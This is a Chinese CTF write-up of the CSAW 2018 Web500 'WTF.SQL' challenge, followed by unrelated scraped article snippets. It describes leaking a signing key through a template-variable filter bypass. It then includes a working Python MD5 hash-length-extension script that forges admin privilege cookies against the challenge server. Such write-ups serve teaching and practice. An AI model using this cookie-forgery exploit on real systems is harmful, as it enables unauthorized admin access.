rebirthwyw
rebirthwyw

csaw2018 web500 wtf-sql

WTF.SQL

周末跟着队里打了一下CSAW,打之前大家和我说这个比赛是for beginner,我真是信了他们的邪了。。。

这道Web500是本次CSAW web板块分值最高的一道,绕了好大一个弯做了出来,就记录一下。

信息收集

题目打开来是注册、登录等常见的功能,额外的有一个POST内容的功能

1.png

然后观察一下响应头里,发现会有一个X-SQL-Fact的头,会随机返回三句话中的一句:

MongoDB (a NoSQL database) ships with no authentication by default!

The <> operator is equivalent to !=

MySQL silently truncates data if it can't fit into the destination field

这个到最后也没用上,有点迷,害我还扫了所有的端口。。。甚至以为这是一道类似WCTF Cyber Mimic Defense 的拟态防御的题。。。

然后扫了一下基本的一些敏感文件,发现了一个robots.txt

User-agent: *
Disallow: / # procedure:index_handler
Disallow: /admin # procedure:admin_handler
Disallow: /login # procedure:login_handler
Disallow: /post # procedure:post_handler
Disallow: /register # procedure:register_handler
Disallow: /robots.txt # procedure:robots_txt_handler
Disallow: /static/% # procedure:static_handler
Disallow: /verify # procedure:verify_handler

# Yeah, we know this is contrived :(

直觉告诉我verify这个路由有点用处!!!

直接GET请求返回

Missing required param 'proc'!

一开始的时候,我以为proc是指/proc/目录的意思,然后试了些类似self、1之类的值都不对

感谢Lyle老哥告诉了我这是procedure。。。都怪我没好好看眼robots.txt

然后就可以愉快地读上面列出的procedure了~~~

所有的文件我放在了网盘里,有需要的可以自取

链接: https://pan.baidu.com/s/1-rRjt_39JxsSIz0h9o8VLg 密码: 43e2

代码审计

这份代码有点皮。不是后端语言的审计,而是mysql的procedure的审计,奇怪为啥要把逻辑写在mysql里。

大概整个业务的逻辑可以按照robots.txt的内容来划分。

整个会话有三个cookie,分别是admin、email、privs。我目测后端在接收到这三个cookie以后,会先进行合法性的校验,校验通过会放入cookies的表中。

admin_hanlder:

  • 先校验是不是admin(从数据库中拿cookie['admin'])

  • 然后判断privs有没有view_panels和create_panels的权限(通过解析cookie['privs'])

  • create_panels可以加一个table_name

  • view_panels可以dump出加的table_name的表的值

  • 所以根据题目描述里的提示,flag.txt就是要加的table_name

login_handler:

  • check用户名密码

  • 获得签名后的 cookie(admin、email、privs)


   SET signature = SHA2(CONCAT(cookie_value, secret), 256);

   SET signed = CONCAT(signature, LOWER(HEX(cookie_value)));

index_handler:

  • 获取post_list

  • 渲染模板展示post的内容

post_handler:

  • 增加post,这里会有一个banned_post_patterns过滤了一些东西

verify_handler:

  • 下载procedure

register_handler:

  • 注册一个新用户

漏洞点

根据admin_handler的内容,不难确定我们需要伪造admin、privs的签名,来以admin的身份加一个flag.txt的table_name。

    SET signing_key = (SELECT `value` FROM `priv_config` WHERE `name` = 'signing_key');

    SET signed_privs = CONCAT(MD5(CONCAT(signing_key, privs)), privs);

其中,privs还额外多做了一次签名的工作,这个是一个典型的hash拓展攻击的例子,这里不赘述攻击的方式。

所以核心问题就是如何获取sign_cookie这个procedure中用的signing_key

    SET secret = (SELECT `value` FROM `config` WHERE `name` = 'signing_key');

    SET signature = SHA2(CONCAT(cookie_value, secret), 256);

    SET signed = CONCAT(signature, LOWER(HEX(cookie_value)));

我在做的时候,一直以为是通过一个sql注入来实现的,但是纵观全局,其实所有的procedure都是参数化形式的sql,不存在sql注入的可能性。

直到我关注到了一个叫做populate_common_template_vars的procedure

BEGIN
    INSERT INTO `template_vars` SELECT CONCAT('config_', name), value FROM `config`;
    INSERT INTO `template_vars` SELECT CONCAT('cookie_', name), value FROM `cookies`;
    INSERT INTO `template_vars` SELECT CONCAT('request_', name), value FROM `query_params`;
END

template_vars是一张临时表,存放的是用template渲染时的变量,可以发现这个procedure把config表中的所有内容都存在了template_vars中,那也就是说,template_vars中有一个config_signing_key变量,是我们需要获得的secret。

populate_common_template_vars函数只在一处被调用到,就是template_string。

而它存在一个将template模板中变量替换为template_vars中值的过程

    SET formatted = template_s;
    SET i = 0;

    WHILE ( formatted REGEXP @template_regex AND i < 50 ) DO
        SET replace_start = REGEXP_INSTR(formatted, @template_regex, 1, 1, 0);
        SET replace_end = REGEXP_INSTR(formatted, @template_regex, 1, 1, 1);
        SET fmt_name = SUBSTR(formatted FROM replace_start + 2 FOR (replace_end - replace_start - 2 - 1));
        SET fmt_val = (SELECT `value` FROM `template_vars` WHERE `name` = TRIM(fmt_name));
        SET fmt_val = COALESCE(fmt_val, '');
        SET formatted = CONCAT(SUBSTR(formatted FROM 1 FOR replace_start - 1), fmt_val, SUBSTR(formatted FROM replace_end));
        SET i = i + 1;
    END WHILE;

    SET resp = formatted;

其中的template_regex为

SET @template_regex = '\$\{[a-zA-Z0-9_ ]+\}';

上面那段代码很好理解,大概就是从头开始碰到一个符合template_regex正则的字符串就替换成对应名字template_vars中的值,然后循环替换直到50次。

也就是说如果template或者说处理中的template中存在${config_signing_key}字样,那我们就大功告成了。

可惜的是直接尝试后发现被上面提到的banned_post_patterns给ban了。

经过了一些试探,banned_post_patterns的规则应该是禁了'\$\{config_[a-zA-Z0-9_ ]+\}'这样一个正则

config开头的变量都禁了。

这时候就需要去绕过这个的限制。还是populate_common_template_vars这个procedure,它还把query_params都存进了template_vars,那么如果我们请求是多加一个比如test参数,然后post一个${request_test}应该就能解析成功。

2.png

激动人心的时刻!!!

3.png

获得了signing_key以后,只要再fuzz一下privs里的那个secret的长度即可完成整个的伪造。

我是拿github上的一个md5 拓展攻击的脚本改改直接跑的,脚本如下

# coding:utf-8

import md5py
from urllib import unquote
import hashlib
import struct
import urllib
import binascii
import requests
import sys
reload(sys)
sys.setdefaultencoding('utf8')

def payload(length, str_append):
    pad = ''
    n0 = ((56 - (length + 1) % 64) % 64)
    pad += '\x80' 
    pad += '\x00'*n0 + struct.pack('Q', length*8)

    return pad + str_append

def hashmd5(str):
    return hashlib.md5(str).hexdigest()

def check_extension_attack():
    for i in range(1, 65):
        s = "A" * i
        mm = md5py.md5()
        assert hashlib.md5(s).hexdigest() == mm.my_md5(s)
        print mm.my_md5(s)
    for i in range(1, 100):
        for j in range(1, 10):
            s = 'A' * i
            salt = 'B' * j
            mm = md5py.md5()
            msg = salt + s + payload(len(salt+s), 'joychou')
            assert hashmd5(msg) == mm.extension_attack(hashmd5(salt+s), 'joychou', len(salt+s))

# check if md5 extension attack is correct
# check_extension_attack()

if len(sys.argv) < 3:
    print "Usage: ", sys.argv[0], "  "
    sys.exit()

hash_origin = sys.argv[1]
str_append = sys.argv[2]
for lenth in range(16,32):

    m = md5py.md5()

    str_payload = payload(lenth, str_append)
    md5ans = m.extension_attack(hash_origin, str_append, lenth)
    # print "Payload: ", repr(str_payload)
    # print "Payload urlencode:", urllib.quote_plus(str_payload)
    # print "md5:", m.extension_attack(hash_origin, str_append, lenth)
    pay = bytes(md5ans) + bytes(str_payload)
    pay1 = binascii.b2a_hex(pay)
    salt = "an_bad_secret_value_nhcq497y8"
    stri = pay + bytes(salt)
    sha256 = hashlib.sha256()
    sha256.update(stri)
    res = sha256.hexdigest()
    url = "http://web.chal.csaw.io:3306/admin"
    cookies = {"admin":"3efb7d99e34432bb6405b6a95619978d4904a2f5b5d8d56b3702939c226d729431",
  "email":"7c7034911c800d26f51c483cba33adf191358b91334faa1e228cbcdc82a11d5e726562697274687779776140676d61696c2e636f6d",
    "privs":res+pay1
    }
    print lenth
    print str_payload
    print res+pay1
    try:
        res = requests.get(url=url,cookies=cookies,timeout=4)
        print res.text
    except:
        pass

这里还有点小的要注意的地方是,view_panels和create_panels在伪造的时候应该是;panel_view;panel_create;这样,因为hash拓展会加padding,不用;分割hash_priv这个procedure会问题。

最后试出来是长度是24,就可以愉快的get flag了。

4.png

你可能感兴趣的:(csaw2018 web500 wtf-sql)

  • csaw2018 web500 wtf-sql rebirthwyw
    WTF.SQL周末跟着队里打了一下CSAW,打之前大家和我说这个比赛是forbeginner,我真是信了他们的邪了。。。这道Web500是本次CSAWweb板块分值最高的一道,绕了好大一个弯做了出来,就记录一下。信息收集题目打开来是注册、登录等常见的功能,额外的有一个POST内容的功能1.png然后观察一下响应头里,发现会有一个X-SQL-Fact的头,会随机返回三句话中的一句:MongoDB(a
  • RSA 原理和一些攻击方法 Part 1 SEVEN_9e53
    Intro很多CTF的crypto题目都有RSA题,而我每次看到RSA都很慌。。。因为数学差在研究CSAW2018的Lowe时候看到一篇博客把RSA的原理和CTF中常用的一些攻击手段总结了一遍。这里我用中文转载一遍他的博客。文章中的攻击都是针对CTF题的,所以有着很多的前提假设,在现实中很难碰到可以利用的情况。RSA的原理RSA是最经典的一个非对称加密算法。一个RSA算法有两个密码,公钥和私钥。公
  • ISCC2016 Web500 write-up lilyui
    题目链接:http://101.200.145.44/web4/首先查看源代码,里面有两段管理员登录先尝试进入admin,显示Forbidden。随后查看源码发现了提示alert('adminipis121.42.171.222')-->想到之前代码里面的proxy.php,于是尝试用proxy.php登录121.42.171.222http://101.200.145.44/web4/proxy
  • CTF web题总结--LFI zzxlinux Web
    本地文件包含漏洞(LocalFileInclude),是php的include()函数存在设计缺陷,学习链接:php文件包含漏洞总结题目的url都是类似这种:http://127.0.0.1/web500/index.php?action=front&mode=indexhttp://127.0.0.1/web500/index.php?action=front&mode=newnotehttp:
  • HQL之投影查询 归来朝歌 HQLHibernate查询语句投影查询
            在HQL查询中,常常面临这样一个场景,对于多表查询,是要将一个表的对象查出来还是要只需要每个表中的几个字段,最后放在一起显示? 针对上面的场景,如果需要将一个对象查出来: HQL语句写“from 对象”即可 Session session = HibernateUtil.openSession();
  • Spring整合redis bylijinnan redis
    pom.xml <dependencies> <!-- Spring Data - Redis Library --> <dependency> <groupId>org.springframework.data</groupId> <artifactId>spring-data-redi
  • org.hibernate.NonUniqueResultException: query did not return a unique result: 2 0624chenhong Hibernate
    参考:http://blog.csdn.net/qingfeilee/article/details/7052736 org.hibernate.NonUniqueResultException: query did not return a unique result: 2         在项目中出现了org.hiber
  • android动画效果 不懂事的小屁孩 android动画
    前几天弄alertdialog和popupwindow的时候,用到了android的动画效果,今天专门研究了一下关于android的动画效果,列出来,方便以后使用。 Android 平台提供了两类动画。 一类是Tween动画,就是对场景里的对象不断的进行图像变化来产生动画效果(旋转、平移、放缩和渐变)。 第二类就是 Frame动画,即顺序的播放事先做好的图像,与gif图片原理类似。
  • js delete 删除机理以及它的内存泄露问题的解决方案 换个号韩国红果果 JavaScript
    delete删除属性时只是解除了属性与对象的绑定,故当属性值为一个对象时,删除时会造成内存泄露  (其实还未删除) 举例: var person={name:{firstname:'bob'}} var p=person.name delete person.name p.firstname -->'bob' // 依然可以访问p.firstname,存在内存泄露
  • Oracle将零干预分析加入网络即服务计划 蓝儿唯美 oracle
    由Oracle通信技术部门主导的演示项目并没有在本月较早前法国南斯举行的行业集团TM论坛大会中获得嘉奖。但是,Oracle通信官员解雇致力于打造一个支持零干预分配和编制功能的网络即服务(NaaS)平台,帮助企业以更灵活和更适合云的方式实现通信服务提供商(CSP)的连接产品。这个Oracle主导的项目属于TM Forum Live!活动上展示的Catalyst计划的19个项目之一。Catalyst计
  • spring学习——springmvc(二) a-john springMVC
    Spring MVC提供了非常方便的文件上传功能。 1,配置Spring支持文件上传: DispatcherServlet本身并不知道如何处理multipart的表单数据,需要一个multipart解析器把POST请求的multipart数据中抽取出来,这样DispatcherServlet就能将其传递给我们的控制器了。为了在Spring中注册multipart解析器,需要声明一个实现了Mul
  • POJ-2828-Buy Tickets aijuans ACM_POJ
    POJ-2828-Buy Tickets http://poj.org/problem?id=2828 线段树,逆序插入 #include<iostream>#include<cstdio>#include<cstring>#include<cstdlib>using namespace std;#define N 200010struct
  • Java Ant build.xml详解 asia007 build.xml
    1,什么是antant是构建工具2,什么是构建概念到处可查到,形象来说,你要把代码从某个地方拿来,编译,再拷贝到某个地方去等等操作,当然不仅与此,但是主要用来干这个3,ant的好处跨平台   --因为ant是使用java实现的,所以它跨平台使用简单--与ant的兄弟make比起来语法清晰--同样是和make相比功能强大--ant能做的事情很多,可能你用了很久,你仍然不知道它能有
  • android按钮监听器的四种技术 百合不是茶 androidxml配置监听器实现接口
    android开发中经常会用到各种各样的监听器,android监听器的写法与java又有不同的地方;    1,activity中使用内部类实现接口 ,创建内部类实例  使用add方法  与java类似   创建监听器的实例 myLis lis = new myLis();   使用add方法给按钮添加监听器  
  • 软件架构师不等同于资深程序员 bijian1013 程序员架构师架构设计
            本文的作者Armel Nene是ETAPIX Global公司的首席架构师,他居住在伦敦,他参与过的开源项目包括 Apache Lucene,,Apache Nutch, Liferay 和 Pentaho等。         如今很多的公司
  • TeamForge Wiki Syntax & CollabNet User Information Center sunjing TeamForgeHow doAttachementAnchorWiki Syntax
    the CollabNet user information center http://help.collab.net/   How do I create a new Wiki page? A CollabNet TeamForge project can have any number of Wiki pages. All Wiki pages are linked, and
  • 【Redis四】Redis数据类型 bit1129 redis
    概述 Redis是一个高性能的数据结构服务器,称之为数据结构服务器的原因是,它提供了丰富的数据类型以满足不同的应用场景,本文对Redis的数据类型以及对这些类型可能的操作进行总结。 Redis常用的数据类型包括string、set、list、hash以及sorted set.Redis本身是K/V系统,这里的数据类型指的是value的类型,而不是key的类型,key的类型只有一种即string
  • SSH2整合-附源码 白糖_ eclipsespringtomcatHibernateGoogle
    今天用eclipse终于整合出了struts2+hibernate+spring框架。 我创建的是tomcat项目,需要有tomcat插件。导入项目以后,鼠标右键选择属性,然后再找到“tomcat”项,勾选一下“Is a tomcat project”即可。具体方法见源码里的jsp图片,sql也在源码里。     补充1:项目中部分jar包不是最新版的,可能导
  • [转]开源项目代码的学习方法 braveCS 学习方法
    转自: http://blog.sina.com.cn/s/blog_693458530100lk5m.html http://www.cnblogs.com/west-link/archive/2011/06/07/2074466.html   1)阅读features。以此来搞清楚该项目有哪些特性2)思考。想想如果自己来做有这些features的项目该如何构架3)下载并安装d
  • 编程之美-子数组的最大和(二维) bylijinnan 编程之美
    package beautyOfCoding; import java.util.Arrays; import java.util.Random; public class MaxSubArraySum2 { /** * 编程之美 子数组之和的最大值(二维) */ private static final int ROW = 5; private stat
  • 读书笔记-3 chengxuyuancsdn jquery笔记resultMap配置ibatis一对多配置
    1、resultMap配置 2、ibatis一对多配置 3、jquery笔记 1、resultMap配置 当<select resultMap="topic_data"> <resultMap id="topic_data">必须一一对应。 (1)<resultMap class="tblTopic&q
  • [物理与天文]物理学新进展 comsci
          如果我们必须获得某种地球上没有的矿石,才能够进行某些能量输出装置的设计和建造,而要获得这种矿石,又必须首先进行深空探测,而要进行深空探测,又必须获得这种能量输出装置,这个矛盾的循环,会导致地球联盟在与宇宙文明建立关系的时候,陷入困境       怎么办呢?  
  • Oracle 11g新特性:Automatic Diagnostic Repository daizj oracleADR
    Oracle Database 11g的FDI(Fault Diagnosability Infrastructure)是自动化诊断方面的又一增强。 FDI的一个关键组件是自动诊断库(Automatic Diagnostic Repository-ADR)。 在oracle 11g中,alert文件的信息是以xml的文件格式存在的,另外提供了普通文本格式的alert文件。 这两份log文
  • 简单排序:选择排序 dieslrae 选择排序
    public void selectSort(int[] array){ int select; for(int i=0;i<array.length;i++){ select = i; for(int k=i+1;k<array.leng
  • C语言学习六指针的经典程序,互换两个数字 dcj3sjt126com c
    示例程序,swap_1和swap_2都是错误的,推理从1开始推到2,2没完成,推到3就完成了 # include <stdio.h> void swap_1(int, int); void swap_2(int *, int *); void swap_3(int *, int *); int main(void) { int a = 3; int b =
  • php 5.4中php-fpm 的重启、终止操作命令 dcj3sjt126com PHP
    php 5.4中php-fpm 的重启、终止操作命令: 查看php运行目录命令:which php/usr/bin/php 查看php-fpm进程数:ps aux | grep -c php-fpm 查看运行内存/usr/bin/php  -i|grep mem 重启php-fpm/etc/init.d/php-fpm restart 在phpinfo()输出内容可以看到php
  • 线程同步工具类 shuizhaosi888 同步工具类
    同步工具类包括信号量(Semaphore)、栅栏(barrier)、闭锁(CountDownLatch)   闭锁(CountDownLatch) public class RunMain { public long timeTasks(int nThreads, final Runnable task) throws InterruptedException { fin
  • bleeding edge是什么意思 haojinghua DI
    不止一次,看到很多讲技术的文章里面出现过这个词语。今天终于弄懂了——通过朋友给的浏览软件,上了wiki。  我再一次感到,没有辞典能像WiKi一样,给出这样体贴人心、一清二楚的解释了。为了表达我对WiKi的喜爱,只好在此一一中英对照,给大家上次课。   In computer science, bleeding edge is a term that
  • c中实现utf8和gbk的互转 jimmee ciconvutf8&gbk编码
    #include <iconv.h> #include <stdlib.h> #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #include <sys/stat.h> int code_c
  • 大型分布式网站架构设计与实践 lilin530 应用服务器搜索引擎
    1.大型网站软件系统的特点? a.高并发,大流量。 b.高可用。 c.海量数据。 d.用户分布广泛,网络情况复杂。 e.安全环境恶劣。 f.需求快速变更,发布频繁。 g.渐进式发展。 2.大型网站架构演化发展历程? a.初始阶段的网站架构。 应用程序,数据库,文件等所有的资源都在一台服务器上。 b.应用服务器和数据服务器分离。 c.使用缓存改善网站性能。 d.使用应用
  • 在代码中获取Android theme中的attr属性值 OliveExcel androidtheme
    Android的Theme是由各种attr组合而成, 每个attr对应了这个属性的一个引用, 这个引用又可以是各种东西.   在某些情况下, 我们需要获取非自定义的主题下某个属性的内容 (比如拿到系统默认的配色colorAccent), 操作方式举例一则: int defaultColor = 0xFF000000; int[] attrsArray = { andorid.r.
  • 基于Zookeeper的分布式共享锁 roadrunners zookeeper分布式共享锁
    首先,说说我们的场景,订单服务是做成集群的,当两个以上结点同时收到一个相同订单的创建指令,这时并发就产生了,系统就会重复创建订单。等等......场景。这时,分布式共享锁就闪亮登场了。   共享锁在同一个进程中是很容易实现的,但在跨进程或者在不同Server之间就不好实现了。Zookeeper就很容易实现。具体的实现原理官网和其它网站也有翻译,这里就不在赘述了。   官
  • 两个容易被忽略的MySQL知识 tomcat_oracle mysql
    1、varchar(5)可以存储多少个汉字,多少个字母数字?   相信有好多人应该跟我一样,对这个已经很熟悉了,根据经验我们能很快的做出决定,比如说用varchar(200)去存储url等等,但是,即使你用了很多次也很熟悉了,也有可能对上面的问题做出错误的回答。   这个问题我查了好多资料,有的人说是可以存储5个字符,2.5个汉字(每个汉字占用两个字节的话),有的人说这个要区分版本,5.0
  • zoj 3827 Information Entropy(水题) 阿尔萨斯 format
    题目链接:zoj 3827 Information Entropy 题目大意:三种底,计算和。 解题思路:调用库函数就可以直接算了,不过要注意Pi = 0的时候,不过它题目里居然也讲了。。。limp→0+plogb(p)=0,因为p是logp的高阶。 #include <cstdio> #include <cstring> #include <cmath&
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他